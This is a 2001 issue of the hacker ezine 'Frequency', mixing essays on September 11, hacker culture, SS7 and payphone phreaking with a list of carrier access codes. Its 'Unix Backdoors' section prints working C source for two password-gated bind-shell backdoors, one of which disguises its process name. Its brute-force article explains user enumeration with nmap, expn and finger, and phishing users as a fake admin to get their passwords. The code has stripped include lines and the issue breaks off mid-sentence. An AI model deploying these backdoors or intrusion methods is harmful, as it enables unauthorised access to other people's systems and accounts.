Frequency: Inside the Hacker Mind October 2001 Freq14 (Disclaimer: Information contained in this ezine is for educational purposes only. Readers are urged to not use this information for illegal purposes.) 1. Introduction "Perspective" 2. Once a Hacker... 3. Tank, Charge the E.M.P. 4. UNIX Backdoors 5. Brute Force - Going Strong or R.I.P.? 6. Practical Uses for Loop Lines 7. The Basics of SS7 8. 2001: A Payphone Odyssey 9. Phone Phreaking in the New Millennium 10. Carrier Access Codes 11. Crosstalk 12. Closing Arguments 13. Crew 1. INTRODUCTION "PERSPECTIVE" September 11, 2001. Another day of infamy. We now live in the generation that has witnessed the most violent destructive act of terrorism ever to occur on US soil. As we sit at our desks playing with our computers, survivors still cling for life in the rubble. As we watch television and ask ourselves how something like this could happen, families are mourning the dead. It was a day of great horror, but through it all the human spirit reigned supreme. And in the end, we saw why America is one of the greatest countries in the world. For an ezine that seems to slam the US government at every turn, it may sound odd to hear us standing up for our country. Let it be clear, we are patriots. We love, and have always loved, the land of the free and the home of the brave. The United States of America is one of the only places in the world where you can live your life with little government interference, and for that we need to be thankful. We need to repay this wonderful land by standing up for it, fighting for it, and protecting it. But of course, we must also protect it from itself. For the past year both Hackermind and Frequency have been doing just that. We've been pointing out the wrongs in our society and lashing out at those that try to destroy the very essence of the USA. Whether it be those that want to silent free speech, states who see to it that youths are punished severely for drawing violent cartoons, or corporations attempting to suck every penny out of an unsuspecting public. Fighting these battles does not make us less American. It shows that we never want to see our country fall. It shows we never want to lose what we have, and most importantly it shows that we love our country enough to question it when it does something wrong. America as a whole is a wonderful idea, and an amazing country. It's up to us to stand up to those that want to make it otherwise. On September 11, this came in the form of 4 airliners that were hijacked by still unknown terrorists (as of this writing no definitive suspects have been named, but the most likely suspect is well known). Using knives, these individuals took control of the planes and crashed two into the World Trade Center, and one into the US Pentagon. The fourth plane crashed outside of Pittsburgh, and it is believed the pilot put the plane down into the ground rather than carrying out the terrorists deadly mission. Words cannot describe the horrors that unfolded during that day. The loss of life was extraordinary, but the bravery and humanity that shone through prevailed against all odds. "They can shake the foundation of our buildings, but not the foundation of the American spirit." -George W. Bush. This quote says it all. No matter how badly these faceless terrorists wanted the US to topple into utter chaos, America showed the world it is what it says it is. A land of peace and prosperity. In all videos of the incident we see, time and time again, people helping complete strangers and endangering their own lives in the process. For no other reason than to help their fellow man people put their own lives in danger, including the hundreds of firefighters and police officers who entered the doomed buildings minutes before they collapsed. To those brave men and women, we send our deepest thanks. The events that took place will never be forgotten, although not for the reasons the terrorists had hoped. Tragedy's like this bring American's closer together, and make their will to protect their freedom loving society grow infinitely stronger. Many in the hacker community may feel a need for revenge, and some may turn to us looking for a way of vengeance. The most important thing to do is not take any foolish actions that could only help to add fuel to the fire. We ask that you please let justice take its course. Make no mistake, we at Hackermind and Frequency will continue to fight the battles that need to be fought in order to ensure the way of life we Americans cherish so fondly. The enemy may be foreign or domestic, but in the end the American way of life will live on. -screamer 2. ONCE A HACKER...: by The Blue Giant Imagine this: It's 2:30 at night, or morning, depending on how you look at it, and you're sitting in front of your computer, pounding at the keyboard furiously, as you have been all day. Trying to write all of the information down before you forget, or finishing that program before your inspiration dries up. Or, maybe, you're reading something, pausing every few minutes to scroll down to the next line of code, or the next section of the article on quantum computing. You're listening to your favorite music, with your headphones on, of course, so as not to wake up anyone else in your household. The cd ended half an hour ago, but it'll be another 30 minutes before you notice. It doesn't matter though, it was only there to get you started anyways, after that it was only being noticed on a subconscious level, and there only barely. You pause for a moment, take a sip of whatever drink you have handy, if there's any left, and lean back in your chair, thinking, gathering your thoughts. Then, with contemplation over, and ideas sorted, you sit back up, take a final swig or pop, and g back to being mesmerized by whatever's on your monitor. You still haven't noticed that the music in your ears has stopped. Now, skip ahead say...12 hours, and there you are. Still sitting in the chair conformed to your body, with the mouse pad perfectly aligned for use with minimal movement. Surrounded by empty bottles and cans from discarded drinks. Pringle canisters lying around your feet with a few crumbs left in them, monitor has slowly been growing more blurry. You did notice that the music stopped, though. This time you made sure to put it on repeat. Your typing starts to slow down, you've started reading the screen less vividly, and the moments of contemplation last longer and longer. Then, slowly, peacefully...almost as though you knew what was happening, you head lowers to the table. You half lay, half sit there, with lines of code and tech jargon still running rampant in your head...right up 'till the music lulls you to sleep. You still dream in binary though. Then, in what seems like only moments, but is really hours, you slowly begin to register a noise in the background, then, even slower you realize that the phone is ringing. Finally, even slower still, you get up and crawl over to the phone. Its your friend, asking why you're late to the party. With a quick glance at the clock you rush upstairs to shower, put on a clean pair of clothes, and off you go. Arriving at the party you begin the circuit, saying hi to everyone that's there, and eventually getting over to your friends to talk with them for the rest of the time, or maybe you even go into a private corner with your girl(boy)friend, if you should be so lucky as to have one. Whenever someone you know walks by you, or stops to talk, you're friendly with them, and maybe walk around a bit, but prefer the relative quiet and peace where you're sitting. And all the while, in the back of your mind, is the thought of your computer, as screens of code roll by, and any ideas get quickly criticized before, in most cases, you throw them back away and another comes to take its place. Not everyone reading this will agree with what I've said, not everyone reading this is as comfortable in social situations as I described, some may be more so. But, no matter what changes you make in your version of the story, the computers are still there. 3. TANK, CHARGE THE E.M.P.: by Dash Interrupt So there I was, vacuuming the entire library for the second day in a row (one of the many privileges of having to do community service at the library) and I look down and see a magazine that says something on the cover about an "E-Bomb". Upon closer inspection I realize it has something to do with an EMP weapon of some sort. So, I did a search on one of the library's ancient Macintosh relic's but of course my library doesn't have anything about what I'm searching for. So after my 4 hours at the library I go home and get on the net, good ol' net, there's always information about whatever topic you're looking for on there. Back to the point, I searched for "EMP" on a popular search engine (google if you're interested) and up comes a whole crap load of pages. The first one I click on is a news article from June 12th, 2000 and the headline actually reads "Facing armed hackers." After reading this article it points out that an EMP device, which can be constructed using regular electrical supplies, could potentially, there's that word again, POTENTIALLY be used by someone (although from this article you'd think that hackers are the only people that would) to destroy computers. This article, while I don't want to linger on it too long, really pissed me off because it only mentions the ways EMP devices could be used to do damage to computers and computer networks by hackers. Also, the article goes on to call people who would do this "terrorists". As if hackers and terrorists are one and the same. One more thing I'd like to mention before I go on is something in the article that really surprised me (although it shouldn't), it says "An EMP device hidden in a server and delivered to an agency Web site location, however, would be a thousand times worse. The Web site would be offline for days, perhaps weeks, and the repair cost would be tens if not hundreds of thousands of dollars." I seriously doubt the cost of repairs would be hundreds of thousands of dollars, but that's just me. Now some of you might be saying "How does it work? How does an EMP device destroy computers?" well, let me explain. According to http://www.dictionary.com, EMP means "The pulse of intense electromagnetic radiation generated by certain physical events, especially by a nuclear explosion high above the earth." Basically, when there's a nuclear explosion it sends out an electromagnetic shock wave which can overload electronic circuits in the surrounding areas. Now after researching this topic further I've found out that trying to make an EMP weapon without some sort of nuclear blast is difficult if not impossible for an average person. If so, the article I mentioned above would be a great example of the news media trying to make hackers appear as evil terrorists who only want to damage computer systems. I've said it before and I'll say it again, hackers have been public enemy #1 for a long time precisely because articles and news reports like this put them in a bad light. Sure, there are hackers out there who do cause damage and who do write viruses and spread them, but the true hacker doesn't want to damage anything, and I know that's been said a million times before but I felt I had to say it one more time. Dash Interrupt "Facing armed hackers" article - http://www.fcw.com/fcw/articles/2000/0612/tec-bragg-06-12-00.asp 4. UNIX BACKDOORS: by w0rm and fusys /* This is a simple backdoor application that can be run on any box that runs unix or linux. Just compile "gcc -o backtrap backtrap.c" and then follow the instructions in the arguments. Then, just telnet to port 7000, enter the password you selected, and type ';' after each command by: w0rm@antionline.org */ #include #include #include #include #include #include #include #include #include #include #include #define copyright "@# (c) Copyright w0rm@antionline.org" #define COLOR "\E[31m" #define NORMAL "\E[m" main(int argc, char *argv[]) { int sockfd; struct sockaddr_in my_addr; struct sockaddr_in their_addr; int newsockfd; char buf[512]; char buff[100]; char buffer[512]; int sinsize; char fin[50]; pid_t spid; char message[] = "Welcome to backtrap v1.0. Type ; after each command\n\n"; char message1[] = "hello\n"; int x; if(argc < 2) { fprintf(stderr, "\n Backtrap v1.1. Backdoor for Linux\n"); fprintf(stderr, " (password must be <= 7) \n\n"); fprintf(stderr, "usage: %s [password] &\n", argv[0]); exit(0); } if((sockfd = socket(AF_INET, SOCK_STREAM, 0)) == -1) { perror("socket failed"); exit(1); } strcpy(argv[0], "pico file"); my_addr.sin_family = AF_INET; my_addr.sin_addr.s_addr = INADDR_ANY; my_addr.sin_port = htons(7000); if(bind(sockfd, (struct sockaddr *)&my_addr, sizeof(my_addr)) == -1) { perror("sockfd"); exit(1); } if(listen(sockfd, 10) == -1) { perror("listen failed"); exit(1); } sinsize = sizeof(their_addr); x = strlen(argv[1]); while(1) { if((newsockfd = accept(sockfd, (struct sockaddr *)&their_addr, &sinsize)) == -1) { perror("socket failed"); exit(1); } read(newsockfd, fin, x); if(!strcmp(fin, argv[1])) { printf(COLOR "Access Granted\n"); printf(NORMAL "\n"); spid = fork(); if(spid != 0) { dup2(newsockfd, 0); dup2(newsockfd, 1); dup2(newsockfd, 2); /* send(newsockfd, message, strlen(message), 0); */ /* Too damn obvious! */ send(sockfd, "\n", 0, 0); execl("/bin/sh", "sh", (char *)0); } } else { send(sockfd, "ERROR(): Unknown error\n", 23, 0); } } close(sockfd); close(newsockfd); return(0); } _______________________________________________________________________________ /* * TCPShell.c Semplice Shell raggiungibile via socket * Scritta solo per impratichirmi delle basi della * programmazione dei socket BSD. * * no(C)1998 by fusys */ #include #include #include #include #include #include #include #define LISTENQ 1 /* listen() backlog */ int main (int argc, char *argv[]) { int lsocket ; /* socket per listen() */ int csocket ; /* socket per connect() */ struct sockaddr_in laddr ; /* struttura IPv4 del demone */ struct sockaddr_in caddr ; /* struttura IPv4 del client */ socklen_t len ; /* dimensioni della struttura IPv4 */ pid_t pid ; /* tipo pid per il fork() */ /* apriamo il server con socket(), bind() e listen() */ if((lsocket=socket(AF_INET, SOCK_STREAM, 0)) < 0) { perror("socket error"); return(10); } len = sizeof(laddr) ; memset(&laddr, 0, len) ; laddr.sin_addr.s_addr = htonl(INADDR_ANY) ; laddr.sin_family = AF_INET ; laddr.sin_port = htons(6666) ; /* apriamo sulla porta 6666 */ if((bind(lsocket, (const struct sockaddr *)&laddr, len))) { perror("bind error"); return(10); } if(listen(lsocket, LISTENQ)) { perror("listen error"); return(10); } /* ora TCP se ne va nel paese dei demoni e si becca come * parente init, pronto a seccarlo alla c Page 2 --> 5. BRUTE FORCE - GOING STRONG OR R.I.P.?: by killall() Brute force hacking is the art of randomly guessing passwords for a given login name, or in more dire circumstances, guessing both the login and password. It's common knowledge that back in the 1980's computers were seldom password protected, and those that were had either easily guessed or default passwords. How often have I seen a "password:" prompt, entered "admin" and been allowed complete access to the system? Alas, far too many times if you consider gaining access to be a crime. Of course, things are different today. Defaults are more or less gone, unless of course some pathetic user forgets to make the password different from their logon name. Damn, must we do everything for them? But the question this article poses results from the argument over the usefulness of brute force in the modern world, is it obsolete or does it still hold some potential? There was a time when brute force was a given if a system had a password protected login. You had to dial up the machine and log in just like a regular user, and of course you would probably only get a regular user account from which to work up from. Nowadays, with the advent of the internet, there are far more access points into a computer system. Each program running on it's own port is capable of being exploited an infinite number of ways. And sadly, most people are content with using someone else's exploit on an unguarded machine just to say they got in. As far as I'm concerned, if the only thing you want is the right to say you got in…you better damn well find your own way. True, some hackers don't care about how they get in, they simply want to use the machine behind the login. I respect these guys completely, and believe it or not I support their use of readily available rootkits. If they're using these machines to do bigger and better things (programming with the processing power of a SunOS, using features not available on Linux distros, or simply furthering their knowledge of the internal workings of an OS they will never be able to own) then I think they're not harming anyone by using the already made progs. Now that we've established there are dozens of ways to get in, including pre-compiled exploits, one has to wonder…is brute force still a viable means of access? You probably have your own opinions, but allow me to state a few of mine. Brute force, while a tiresome act for the most part, is a guaranteed access strategy. Eventually you WILL crack the password and gain access to the machine, it's only a matter of time. Of course most people tire after trying three or four failed logins, but the beauty of UNIX is that you can keep connecting and trying over and over (if the IDS isn't that good of course, or if you're using an OS similar to VAX). Most hackers I know agree, access is the best thing to have. Once you're in a computer, even just by using someone else's pathetic no-privs account, you can play around for hours and learn all sorts of cool things. So if we can get an account by way of brute force, we're doing good so far right? I mean, if we use the account sparingly and do no harm who's going to bother checking the logs? Alright, now…how did we go about getting this account? First off, try scanning the server for open ports that may offer account information. My faves are 25 and 79. If you have one server in particular that you want to play with, just telnet to those two ports and see if they respond. Otherwise, use nmap to do the following: $ nmap -sS -p 25,79 -v -n XXX.XXX.XX.XX Where XXX.XXX.XX.XX is the ip addy of your target. You could also scan a large range of ips to find out which servers have 25 and 79 open. Once you've found a few, telnet to them. At port 25 type: expn root If expn is available on the server you should get some information about root, including email, last login, names, etc. Most properly configured emails won't give you this info, so you'll have to hope that port 79 will. Using a finger client on any shell, you could type: finger @jimsucks.com To return a list of everyone currently logged into the system. Again, any sysadmin with half a brain wouldn't allow 79 to be wide open, but with a little luck you've got some account names. This is only necessary if you don't have a name of course, sometimes you do. For example, one of my first "hacks" was getting into a friend's email using brute force. Now I know, I know…that's rather sad and intrusive, and perhaps not even a hack. But it was a long time ago, and I only did it to test her security out of curiosity. Sadly, her password was easily guessable by anyone that knew her. There was little I could do to help her without exposing my actions, but I did send her a nice anonymous email. Anyway, back to the point of the article. We can see that username's are readily available. But how do we get passwords when we don't know someone? Email, and common trickery (aka social engineering) are the keys. By sending bogus emails to accounts on a particular system, designed to appear to be coming from the admin of said system, it's possible to convince at least one person to change their password to whichever one you dictate. While very amateurish, it's also extremely effective. Just use an anonymous smtp server to do this. There used to be some online, but due to foolish individuals who used this service for malicious purposes they no longer exist. But as is always the case you can find something out there, just look around. Perhaps there are better ways of getting into a system, but I hope this article has shown you skeptics that dedication will persevere, and that anyone with a username and the yearning to gain entrance into a system can do just that. It's true there are reasons why brute force hacking isn't the most efficient way to get into a computer, but let us not dismiss it. If it came down to whether or not brute force is still around, I'd say it definitely is. 6. PRACTICAL USES FOR LOOP LINES: by Sad is Tic Loop lines are a valuable commodity in the hacker world, and I really don't think anybody would disagree with me on that. But as we've all seen, they've been quickly disappearing from the phone network for some time now. Several of the lines posted in Freq10 by TRON are still available, and with that in mind I write this article. I suppose it's important to clarify the difference between a loop line and a conference call before I go any further, since a lot of you haven't got a clue as to which is which. A conference call is a moderated session initiated by way of a legal telephone service (Alliance Teleconferencing is one example) in which one person sets up a multi person call, typically for business purposes. Since talking to more than one person is treated as a luxury by phone companies and similar entities, these conferences will typically break your bank if you plan on staying on longer than five seconds. I won't give actual prices, but if you're curious get your local operator on the phone and ask her to connect you to a teleconferencing service. Loop lines are different though. Loop lines are nothing more than extra lines being unused by the phone company and are essentially "tied off," thus allowing people to call both ends and communicate. Now I know a lot of people are bitching because they insist loop lines are something entirely different, but I think it's still arguable to this day what exact purpose they serve. Fact is, they're unmoderated and free to call if you're in their local area. If you're not, you pay for the cost of the call and nothing more. There are two ends to every loop line, a high and a low. The high end (the higher of the two numbers) is typically the more enjoyable place to be as no one can hear you enter. The low end however, typically gives off a string of touch tones representative of your number to let people know you entered. Of course it really makes no difference which side you call, although this does bring up another interesting point. Are they legal? I cannot tell you how many times people who are new to phone phreaking have asked me this! For some bizarre reason they seem to think that dialing a number and talking is illegal! …ok, I suppose in wake of all that's happened to people just for scanning computers it's somewhat understandable why they would be afraid. But I assure you, if you did nothing illegal to make the call or access the loop you're in the clear. So in other words, as long as you didn't break into the CO and make the loop yourself, or hack a switch and remove an intercept recording so you and your buddies could converse, you're perfectly fine! And that brings me to the practical uses of loop lines. Obviously the best use would be for a conference call, and a free one at that. Many people seem to think you're robbing the teleconferencing services by using a loop but I say if the service is there go right ahead. Would people pay for gas if gasoline-free cars existed? Hell no, so why should they pay enormous sums of money for a service that's readily available…if you find it of course. So then, how would one go about setting up a conference call? If you can't answer that, please don't say you're a phreak…or a person capable of thought for that matter. All you need to do is get in touch with your buddies, or business associates cus hey…I'm not prejudice against those suit types, and agree to meet on a particular number at any given time. Bingo, free conference call. Of course…it's not private, and you can't control it in one of those dominatrix fashions…but after all it is free, so shutup. The next best practical use would be, yup you guessed it, fucking with the operator! Now is this a legitimate use? Ooh I seriously doubt that, but it sure is a lot of fun and will most certainly give you a laugh. The best thing to do is call up an operator (either local or long distance, depending on where the loop is) and tell her you're getting an odd message. When she tries the line, she'll receive nothing but dead air and be quite confused. If that's too dull for you, I suggest using another line and calling the loop on the high end…then have the operator dial into it on the low. When she connects, she'll hear you! Now you can fool her into thinking she's getting crosstalk or even that her lines are somehow connecting her to the same person. But, if you're like me and that's still not good enough…have two buddies call the loop and start up a conversation, then have the operator dial into it. She'll hear the conversation, and be most confused. You could also have one of your buddies pretend to be an intercept recording and then see how long it takes her to catch on! It's important to mention that you should always check the loop to see if anyone's on it…few phreaks appreciate someone sending an operator into their conversation. Also, and perhaps most important of all, when you bring attention to a loop line IT MAY BE SHUTDOWN! I can't stress that enough, if you play around with an operator and she realizes it's a loop she's hearing, she'll probably report it and have it taken offline. So I beg you, please don't do this on loops that people use. They're so hard to find these days that it would be a shame to see even more disappear. Lastly, the most practical use of a loop line…anonymity. Have you ever wanted to talk to someone without them getting your number? Call the high end of the loop, and have them call the low. You'll get their string of touch tones, but they'll get nothing of yours…and no way to trace you back! This can also be useful to screw with ANI on certain LD carriers. By calling a loop and three way dialing to an operator, it may be possible to hide your calling location. But of course, I don't advocate breaking the law. That's just about it for the practical uses of loop lines. Again I would like to urge you to not do anything that could lead to their demise. They're such a rarity in today's world that they should be treated like gold. In fact, they're one of the last things still remaining from the phone phreak days of yesteryear. 7. THE BASICS OF SS7: by Screamer Chaotix To my surprise (and horror) few people I've talked with really knew what SS7 was. I'm certain the more experienced hackers out there know everything I'm about to dictate, but hopefully some of you less informed will get something out of it. To begin, SS7 stands for "Switching System 7" and was designed to allow for more features on your telephone line and security precautions. Features include call return (*69), call back (*66), and of course caller id. Security precautions should be obvious to anyone who calls his/herself a phone phreak. It comes in the form of "out of band signaling." Which, simply put, means switching information travels on a different channel than your voice. This was created to prevent those evil phreaks from controlling the phone switches and routing their calls wherever they like. To explain this in a bit more depth let me start at the beginning. The 60's and 70's - Years of the Phreak Using a small device called a "Blue Box" a person could generate the tones necessary to control long distance switches, thus allowing them to route their calls through any trunk, and to any operator, they liked. The mechanics were rather simple, with only the tones being important. And of course, the most important tone was 2600hz. With a regular phone you could send 2600hz down the voice channel to make the switch think the line was vacant. Then using special MF (multi-frequency) tones you could route a call anywhere you liked. This was exploration in it's most exciting electronic form. A person with a blue box could tour the world from their home phone (not smart) or any nearby payphone (now you're thinking). The fun wouldn't last forever of course, soon the phreaks would lose their freedom…thanks to public attention and a little thing known as out of band signaling. To understand out of band signaling one must first know the types of switches that are out there. These are known as "points" in the telephone network. There's the SSP (System Switching Point) which is your local switch. Next up is the STP (System Transfer Point) which does the actual routing of data. And finally, there's the SCP (System Control Point), which is essentially a big database full of routing information, caller info, and other goodies that dictate where your call goes. I'll explain what SS7 has to do with this in a minute, but first let's make a phone call. Pick up the phone and dial a number. First, your local switch (SSP) receives the numbers you've dialed and finds an open voice channel for your call to go through on the trunk. Once found, the channel becomes reserved for your call. Next, the switch will send the call request to the SCP (through the STP) where the number you've dialed is decoded and routed back through the STPs to the SSP where your call is going. This switch gets the information from the SCP as to who is calling, where they're from, whether or not their caller id is being blocked, and who they're calling. When this is received the switch sends back a reply to the first switch announcing that the call can be completed. By this time, the other person's phone is ringing, and by the time they pick up the voice channel is open on the trunk allowing you both to communicate…about all sorts of important things. It should be noted that this is just the VERY basics of how a call is completed. It has left out the bits of data that travel through, such as IAMs and TCAPs etc. For more information, I suggest you have a look at sites like www.howstuffworks.com and search for phone systems. Now that we've made the call, we know how the information goes through. In the olden days it was much simpler. Rather than traveling through STPs and gathering information from SCPs, all data traffic went through the same channel as your voice. The dangers of this were mentioned before, but what's not clear to a lot of people is why we need this complex system when we could just reserve one channel on the trunk for data. Finally, we get to SS7. In it's simplest form SS7 could be used as described above, nothing more than a reserved channel on a trunk. But due to high network traffic and people making more than just local calls, it's impossible to send all this data through a single trunk (a trunk going from California to Amsterdam…picture it). SS7 alleviates this problem by leaving the voice channels for the trunks, and the data traffic for the STPs (those are the routers remember) and the SCPs (remember…just a big database of information). Not only does it clear up traffic (allowing voice traffic to travel at 56-64kbps) it also prevents you, the phone phreak, from being able to send those magical tones down the line. 2001 - Theories and Mindless Ramblings of a Sleep Deprived Phreak Above I've given you a brief introduction to switching system 7. Everything gets easier if you think of it as both hardware and software rolled into one to route data through the phone network without traveling down the same trunk as your voice. But now onto the more hacker like possibilities that I've either heard discussed, or contemplated myself. "He who controls the spice, controls the universe." -Frank Herbert's DUNE. The spice, in this case, are the switches that keep the world connected. In the days of 80's (Remember those? Big hair, cool movies and songs, and really bad clothes?) it was possible to scan out phone switches with your home telephone (usually located up above the 9900 suffix). You knew you had one when you received the high pitch screech. Then with your modem (if you weren't using a demon dialer of course) you would call it up, and voila…you were in. And in some cases, you really were in…no passwords or anything. And if there was password protection, getting it was only a phone call away. But that's only if you didn't feel like sitting there for an hour or so with a pencil and paper. Of course, as with everything else this became harder and harder to find. In fact, I've only heard of a few people finding switches they could dial into within the past few years…if you've had the pleasure, please share with the rest of us. But what if? Even if they couldn't get into the SSP, what if someone managed to sneak between the STP and SCP and actually sniff the data? Picture all that private information sitting right on your computer screen. Sure it's extremely hypothetical, but everything starts with an idea. You would see the originating number, the destination number, and all of the information that's left up to the SCP to figure out. Ever wanted to trace the cops before they trace you? It might be easier than you think, if you had access of course. Well there you have it, my brief intro to SS7 and a few possibilities to keep you interested for a while. I realize this isn't everything there is to know, but we can save that for another time. Hopefully you've got the basics of SS7 down and are ready to learn more, I wish you the best of luck. And ladies, be sure to kiss your local phone phreak. -screamer 8. 2001: A PAYPHONE ODYSSEY: by Incogl33to Below is the factual account of one phone phreaks early morning journey. I figured it would be amusing at best and a space filler at worst, so here we go. 4:33AM The sun wouldn't be up until 5:30, so I figured now would be as good a time as any to go out and play around with the phone system for a while. With the days of the blue box gone, it's somewhat disappointing having to find new ways to get where you want to go, and yes I admit it…sometimes I do it legitimately. But hey, maybe that will show people that hackers and phone phreaks aren't out there to rob anyone, they're just doing what they find fun. For me, it's the thrill of getting a call to go where I want, how I want. Back in the blue box days, this was easily accomplished by gaining control of a switch and routing the call yourself…but today this luxury no longer exists. Alas, I wasn't going to let that stop me. At approximately 4:33 I hopped in my car and drove off into the early morning darkness. 4:45AM My first stop would be the first of two local malls in my area. Hopping onto the freeway, which was eerily empty at this hour, I sped off doing a blazing…well ok I was going 62, but hey I'm not crazy like some of you. It only took ten minutes for me to reach the mall, and when I did I saw that it too was empty. There was the occasional car here and there, mainly night crews and security guards I suspected. Adding to the small amount I parked my car (close to the others I might add, as to avoid suspicion) and headed for the side of the large castle like building. The sky was still dark and speckled with stars as I approached the first phone booth. It was a sturdy looking one mounted on the wall (ok so maybe the expression phone "booth" is a little outdated for the US, but you get the idea) and I wasted no time in picking up the receiver. I did the usual stuff, most of which I won't reveal for my own safety, and had a blast. One thing that I can mention is a little experimentation I did with carrier access codes. I had heard that some payphones allow their use, while some will only give you the same carrier over and over. For example, dialing 10-10-222-0 for an MCI operator would only get me AT&T! No matter what carrier access code you dialed, some phones would only allow you to use the long distance provider that the phone was set for. Out of curiosity I dialed 10-10-333-0, and sure enough I got Sprint. At the risk of this payphone having Sprint as it's long distance carrier (very doubtful, but still possible) I tried 10-10-288-0 for AT&T, bingo! AT&T. Alright, so this phone was a nice one and would let you dial whichever access provider you wanted. I had some more things to try, but first…I desired a new location. 5:01AM After cruising back down the highway and nearly getting killed by the enormous tractor trailers driving like maniacs I reached my second destination, a rest stop in the proverbial middle of nowhere. Sure it was on the side of the highway, but it was surrounded by thick woods and was the kind of place where the clerk got a little nervous if you walked inside. To his relief I, the black wearing hacker type kid, did not go inside. Instead I focused my attention on the bank of payphones beside the picnic area. Immediately I dialed 10-10-288-0 and got AT&T. Knowing I could dial any 800 number for free, I entered in a few ANAC's I had handy. The call went through and I received the number of the AT&T center I was calling through as the ANI readback, pretty useless, but fun nonetheless. Of course, dialing an AT&T number that was operated by the AT&T center I dialed through wouldn't work, oh well. That was fun, I figured I'd go use the bathroom and fill the clerk with dread… 5:17AM After my reign of terror (in other words after I had the nerve to walk into the rest stop at 5 in the morning) I headed for my next location. This was the place that I heard would not allow you to use a different carrier, and I was most intrigued. The phones there were in a small rest area on the side of a building (the place was a school by the way). Picking up one of the receivers I dialed 1-700-555-4141 and received the AT&T message. Knowing they had AT&T, I did what any other self respecting phone user would do…I dialed 10-10-811-0 to get VarTec (or NOS if you wanna be picky). AT&T. What the hell? How dare they not let me use the carrier I wished to! Do they think I'm stupid or something? Do they think that no one in this school knows they have the right to equal access under law? This simply would not be tolerated, why should I have to dial some 800 number to reach the operator I desired? Feeling my blood boil (well maybe not boil, but there was a sizzle!) I dialed 00 and got the long distance operator. "AT&T how may I help you?" they mumbled. "Hi, I'm trying to use a carrier access code on this phone, but it keeps directing me to you," I replied, doing my best to sound confused. "That's not us sir, that's the local provider, you'll have to deal with them." "I really don't have the time, can you connect me to a different carrier?" "No sir I don't have that capability." Oh, so the phone company can't dial a number all of a sudden…I don't know about you, but that kind of scares me when you consider how much of the world they own. Still I wasn't about to lose my cool, it wasn't in my nature. As calmly as I could I hung up the phone and dialed 0. "Verizon how may I help you?" Ugh, shiver, Verizon...very bad, mucho baddo. "Hi operator, I'm trying to get long distance, can you connect me to a specific provider?" "No sir you have to dial that directly using their access code." "Oh I know, but this phone won't let me it keeps giving me AT&T." "Hold on one moment sir." Ah success, right? It had to be a good thing she was checking to see what the problem was and it would be rectified. But then I heard it. "AT&T how may I help you?" AAAH!!! The damn Verizon operator put me through to AT&T!!! I didn't want AT&T!!! I had other ways to try still, but I figured this would be enough. 5:30AM That would also be enough for this first payphone odyssey. Maybe it wasn't as informative as other articles, but I sure had a lot of fun writing it. I look forward to writing some more because I'm always doing these little phone trips. But, to conclude this story, I took the long drive home and picked up my own phone. As the sun came up there were still a lot of things left to try before I went to sleep. -TO BE CONTINUED- Page 3 --> 9. PHONE PHREAKING IN THE NEW MILLENIUM: by Argonaut While traversing the internet one fine evening, I came upon an article that somewhat frightened me at first glance. After giving it a thorough read I realized there were a few flaws contained within, and I would like to address those here. Much to my, and possibly your dismay I don't have the article handy. Although I'm fairly certain you can find this topic scattered about the internet. To make up for this carelessness, I will try and relate the information from the article to you, along with my comments. First off, the article discussed the future of telephony by explaining how more and more services will move online, a digital integration if you will between phones and computers. The author predicted that when the day arrives where we see our NIC's acting as phone jacks and our broadband connections being used to carry our everyday voice calls, the day of the phreak will have been long since past. Stating theories along with facts, the author seemed to conclude that the merging of two different technologies would bring about the end of the simplistic phone phreak because there would be little they could do. By "little they could do" the author referred to damage, because as we all know that's what hackers and phone phreaks are really about…financial gain and destroying things. So here we have an author stating there would be little for phone phreaks to do when these two systems become one, and who also has the nerve to say that little can be done with a regular phone nowadays anyway. Let's examine this piece by piece, beginning with the final statement. There's little that can be done with a phone…well I suppose that's accurate to a certain degree. He does give notice to social engineering, which can be used to gain access to "privileged information," but makes it abundantly clear that he sees no danger from phone phreaks at this point in time. Which I suppose is a good thing, but let's not put the final nail in the coffin! I won't say how phone phreaks can cause harm, but I must disagree with anyone who claims that phone phreaks have no power whatsoever in a world moderated by IP numbers and encryption algorithms. A phone phreak is a person who understands how your calls are routed, and with said knowledge has more power than most anyone else. The power comes from understanding a system that few ever bother to learn, and this gives them the ability to make a call the way they want to. Again, I will not humor this author by explaining how this could be used for illegitimate purposes, though I'm sure you can see. Next up, the author claims that the new technology will make the phone phreak obsolete, but first please allow me to begin a new paragraph. Phone phreaks may be considered by many to be a dying breed. With computers pushing the limits of technology few see a reason to play with their phone anymore, after all what can be accomplished? If you ask my humble opinion, I say this is something akin to techno-fear. Dreading progression and the future of technology because one is so preoccupied with its current state. But if we always remain in the past and present, what can we ever hope to learn from the future? If phone phreaks from the 70's and 80's hadn't begun playing with cell phones, would we know anything about cloning or how easily they could be listened in on today? Progression is what keeps things new, and this logic should be applied to the article I'm describing. To suggest that phone phreaks will have little power when phone calls are made through computers is absurd! Of course there will no longer be use for landline phones in your home, and many may miss that, but when computers are used for calls can you imagine all the new doors that will open? Calls traveling through computer routers which can be accessed from virtually any terminal in the world…things like that make my mouth water. Hackers will assist the phreaks in the computer stuff, assuming of course they don't already know, but it will be the phreaks that know how those calls are being made. With that said, I hope everyone out there has found a new respect for the phone phreak. And perhaps most importantly, I hope that everyone has seen a few reasons why we mustn't believe that advancing technology means the destruction of older ways of hacking. After all, staying on top of the newest breakthroughs will always keep hackers and phone phreaks one step ahead of the game. 10. CARRIER ACCESS CODES What follows is a listing of various Carrier Access Codes, which are used to route your call through a different long distance network than the one your phone is currently linked up to. Please note, prices are not listed, and many carriers have outrageous surcharges! Be sure to find out the cost before dialing. Usually operators can be reached by dialing the access code and 0, but if that produces nothing we suggest you look it up online. All codes begin with 1010: (Unknown means a carrier exists, but it was unreachable from our calling area.) 003 - Global Crossing 004 - ATX Telecommunications Network 005 - Vartec/NOS 019 - SNET All Distance 026 - Global Crossing 033 - Unknown 040 - Qwest 056 - Qwest 063 - MCI WorldCom 070 - Qwest 071 - Broadwing 081 - Turtel Tel Long Distance Network 086 - Global Crossing 096 - Global Crossing 123 - Global Crossing 130 - Global Crossing 132 - One of the Alliance Group Companies 135 - Global Crossing 140 - Sprint 194 - Global Crossing 211 - Global Crossing 220 - MCI WorldCom 222 - MCI WorldCom 224 - MCI WorldCom 234 - Unknown 241 - American Longlines 252 - Sprint 275 - Unknown 284 - MCI WorldCom 288 - AT&T 297 - Long Distance Wholesale Club 321 - MCI WorldCom 333 - Sprint Remember, you hear each carriers long distance welcome message dial the access code "1010XXX" plus 1-700-555-4141, which is free of charge. There are hundreds more out there, so look for more codes in future issues! And remember, be friendly to those operators! 11. CROSSTALK Ø I think I could really help you with something, would you like my assistance/can I be a member of the 